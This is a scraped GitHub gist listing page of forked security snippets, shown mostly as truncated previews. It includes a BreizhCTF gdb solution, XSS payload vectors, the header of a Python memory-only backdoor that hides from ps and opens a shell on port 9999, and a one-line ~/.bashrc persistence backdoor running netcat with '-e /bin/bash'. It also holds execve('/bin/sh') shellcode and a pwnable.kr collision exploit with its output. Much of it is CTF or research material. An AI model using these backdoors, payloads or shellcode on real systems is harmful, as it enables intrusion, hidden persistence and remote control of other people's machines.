Requirement :
- Ollydbg
- OllyDumpEx Plugin
- Un cerveau avec des connaissances sur RunPE
spnow
/ rev150.gdb
Created
January 3, 2017 14:14
— forked from toufik-airane/rev150.gdb
Breizh CTF 2015
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # BreizhCTF2015 Reverse me ! (150pts) Solution | |
| shell python -c "print'a'*42" > /tmp/in | |
| # cmp dl, al | |
| b*0x080485c7 | |
| command | |
| set $eax=$edx | |
| append value /tmp/flag.log $eax | |
| c | |
| end | |
| r < /tmp/in |
spnow
/ XORStrings.c
Created
January 3, 2017 14:08
— forked from toufik-airane/XORStrings.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| 2013/03/08 | |
| XORStrings V0.0.1, look for XOR, ROL or SHIFT encoded strings in a file | |
| Source code put in public domain by Didier Stevens, no Copyright | |
| https://DidierStevens.com | |
| Use at your own risk | |
| Shortcommings, or todo's ;-) | |
| - file must fit in memory | |
| - unicode support |
spnow
/ 666_lines_of_XSS_vectors.html
Created
January 3, 2017 14:00
— forked from toufik-airane/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
spnow
/ pypest.py
Created
January 3, 2017 13:59
— forked from toufik-airane/pypest.py
Hackish one-liner memory-only backdoor agent which hides from ps
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # This script prints a simple one-liner memory-only backdoor agent which hides from ps. | |
| # It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite | |
| # and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the | |
| # process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre) | |
| template = """ | |
| import sys,re,pty,os,socket |
spnow
/ watchbackdoor.sh
Created
January 3, 2017 13:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo watch -n5 "/bin/nc.traditional 127.0.0.1 8082 -e /bin/bash" >> ~/.bashrc |
spnow
/ DefeatRunPE.md
Created
January 3, 2017 13:55
— forked from toufik-airane/DefeatRunPE.md
spnow
/ Returnmprotect.md
Created
January 3, 2017 11:58
— forked from toufik-airane/Returnmprotect.md
Ret2mprotect is an elegant way to bypass mitigation like NX/DEP by using mprotect() to set memory protection.
I assume that you are confortable with x86 stack-based overflow, ASM and shellcode.
spnow
/ McAfeePrivesc.md
Created
January 3, 2017 11:49
— forked from toufik-airane/McAfeePrivesc.md
Thanks to @funoverip for his password decryption tool.
Thus to increase my reverse skills I'm back.
spnow
/ README.md
Created
December 22, 2016 12:52
— forked from plvhx/README.md
list of hand-made shellcode i've ever used in CTF...
[execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL)]
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" + \
"\x50\x53\x89\xe1\x8b\x54\x24\x08\xb0\x0b\xcd\x80"
[execve("/bin/sh", ["/bin/sh", NULL, NULL], NULL)]
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50" + \
"\x50\x53\x89\xe1\x8d\x54\x24\x08\xb0\x0b\xcd\x80"
spnow
/ README.md
Created
December 22, 2016 12:48
— forked from plvhx/README.md
pwnable.kr collision writeup
col@ubuntu:~$ ./col "$(python -c 'import struct;print "\xff"*(1 << 4) + struct.pack("<I", (0x21DD09EC + 4))')"
daddy! I just managed to create a hash collision :)